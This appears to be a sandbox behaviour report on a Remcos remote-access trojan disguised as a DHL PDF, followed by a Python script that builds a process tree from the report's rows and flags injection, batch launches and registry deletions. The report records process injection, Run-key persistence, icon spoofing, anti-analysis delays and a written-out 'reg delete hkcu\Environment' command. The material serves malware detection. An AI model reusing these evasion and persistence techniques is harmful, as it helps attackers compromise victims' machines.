Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 0042F460 appears 43 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 004165D8 appears 37 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 004020B5 appears 31 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 00404818 appears 31 times
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Iqzenco.exe.0.dr | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Iqzenco.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Virustotal: Detection: 26%
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | ReversingLabs: Detection: 24%
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File read: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe 'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe'
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\reg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
Source: unknown | Process created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_004132F7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004132F7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Iqzencolmjnhoxprppdkgkfyidrxfas[1]
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@23/10@49/2
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0040D1AD GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CreateMutexA,CloseHandle,
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1852:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5192:120:WilError_01
Source: C:\Windows\SysWOW64\mobsync.exe | Mutant created: \Sessions\1\BaseNamedObjects\Remcos-8VTGWT
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5508:120:WilError_01
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0040D41E FindResourceA,LoadResource,LockResource,SizeofResource,
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mobsync.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\mobsync.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_00458435 push esi; ret
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042F4A6 push ecx; ret
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_00450918 push eax; ret
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: .....
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ......
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: .....
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ....
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ......
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ....
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ......
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: ......
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Static PE information: section name: .....
Source: Iqzenco.exe.0.dr | Static PE information: section name: .....
Source: Iqzenco.exe.0.dr | Static PE information: section name: ......
Source: Iqzenco.exe.0.dr | Static PE information: section name: .....
Source: Iqzenco.exe.0.dr | Static PE information: section name: ....
Source: Iqzenco.exe.0.dr | Static PE information: section name: ......
Source: Iqzenco.exe.0.dr | Static PE information: section name: ....
Source: Iqzenco.exe.0.dr | Static PE information: section name: ......
Source: Iqzenco.exe.0.dr | Static PE information: section name: ......
Source: Iqzenco.exe.0.dr | Static PE information: section name: .....
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
Source: initial sample | Static PE information: section where entry point is pointing to: ......
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File created: \entrega de documentos dhl _ 27-09-21,pdf.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File created: \entrega de documentos dhl _ 27-09-21,pdf.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File created: \entrega de documentos dhl _ 27-09-21,pdf.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File created: \entrega de documentos dhl _ 27-09-21,pdf.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File created: \entrega de documentos dhl _ 27-09-21,pdf.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File created: \entrega de documentos dhl _ 27-09-21,pdf.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | File created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Iqzenco
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Iqzenco
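The process-creation rows above carry the whole execution chain in a handful of lines: mobsync.exe and secinit.exe started with a bare command line by the sample and by its dropped copy Iqzenco.exe, batch files run from C:\Users\Public, and reg.exe deleting the windir value under HKCU\Environment. The Python below is an added triage example, not part of the Joe Sandbox report and not Remcos code; it re-parses a constructed copy of those rows (source column and event column separated by " | ") into a parent/child tree and applies four heuristics. The rule names, the "bare command line" test for an injection host and the Public\Libraries path check are this example's own assumptions, not signature names from the report.

```python
import re
from collections import defaultdict

# Constructed input: "Process created" rows copied from the report above, one per
# line, with the source column and the event column separated by " | ".
REPORT_ROWS = r"""
Source: unknown | Process created: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe 'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe'
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: unknown | Process created: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe'
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exe
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
""".strip().splitlines()

ROW_RE = re.compile(r"^Source:\s*(?P<parent>.*?)\s*\|\s*Process created:\s*(?P<event>.*)$")
# The image path may contain spaces (the sample name does), so the image ends at
# the first ".exe" that is followed by whitespace; the rest is the command line.
EVENT_RE = re.compile(r"^(?P<image>.+?\.exe)\s+(?P<cmdline>.*)$", re.IGNORECASE)

SYSTEM_DIR = "c:\\windows\\"
PUBLIC_DIR = "c:\\users\\public\\"


def parse_rows(rows):
    """Return (parent_image, child_image, command_line) triples from report rows."""
    triples = []
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        e = EVENT_RE.match(m.group("event"))
        if e:
            triples.append((m.group("parent"), e.group("image"), e.group("cmdline")))
    return triples


def process_tree(triples):
    """Parent image -> list of child images, in the order the report lists them."""
    tree = defaultdict(list)
    for parent, image, _ in triples:
        tree[parent].append(image)
    return dict(tree)


def analyse(triples):
    """Apply the heuristics (names are this example's own) to each creation."""
    findings = []
    for parent, image, cmdline in triples:
        p, i, c = parent.lower(), image.lower(), cmdline.lower()
        name = i.rsplit("\\", 1)[-1]
        # 1. A Windows binary started by a non-Windows parent with a bare command
        #    line (no arguments at all): the usual host for process injection.
        if i.startswith(SYSTEM_DIR) and not p.startswith(SYSTEM_DIR) and len(c.split()) == 1:
            findings.append(("injection-host", parent, image))
        # 2. cmd.exe executing a batch file dropped under C:\Users\Public.
        if name == "cmd.exe" and ".bat" in c and PUBLIC_DIR in c:
            findings.append(("public-batch", parent, image))
        # 3. reg.exe deleting a value under HKCU\Environment.
        if name == "reg.exe" and "delete" in c and "hkcu\\environment" in c:
            findings.append(("env-value-delete", parent, image))
        # 4. Any executable running out of the Public\Libraries drop location.
        if i.startswith(PUBLIC_DIR + "libraries\\"):
            findings.append(("public-libraries-exec", parent, image))
    return findings


if __name__ == "__main__":
    rows = parse_rows(REPORT_ROWS)
    for parent, children in process_tree(rows).items():
        print(parent)
        for child in children:
            print("    ->", child)
    for rule, parent, image in analyse(rows):
        print(f"[{rule}] {parent} -> {image}")
```

On the rows above the script reports three injection-host creations (mobsync.exe twice, secinit.exe once), two batch launches from C:\Users\Public, one HKCU\Environment deletion and one execution from Public\Libraries. Heuristic 1 is deliberately narrow: conhost.exe is spawned by cmd.exe with arguments and a Windows parent, so it is not flagged, and on a real endpoint the same rule should be paired with the memory-write telemetry further down rather than used alone.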

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: icon4828.png
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mobsync.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Delayed program exit found
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0040D455 Sleep,ExitProcess,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0040D455 Sleep,ExitProcess,
Source: C:\Windows\SysWOW64\mobsync.exe TID: 3628 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\mobsync.exe TID: 3880 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\secinit.exe TID: 2388 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\mobsync.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\mobsync.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\mobsync.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\secinit.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_00406176 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_00406176 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004456A9 FindFirstFileExA,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\SysWOW64\mobsync.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\mobsync.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\secinit.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0040D072 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0044697D GetProcessHeap,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0043B789 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0042F1CD SetUnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_004360A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042F1CD SetUnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042F07F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004360A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042F62C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2C60000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2C70000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2C80000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D10000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D20000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D30000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D40000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D50000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D60000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D70000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D80000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 50600000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D90000
Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2DA0000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D30000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D40000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2D50000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2DE0000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 2DF0000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3000000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3010000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3020000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3030000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3040000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3050000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 50600000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3060000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\mobsync.exe base: 3070000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 2F50000
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe | Memory written: C:\Windows\SysWOW64\secinit.exe base: 2F60000
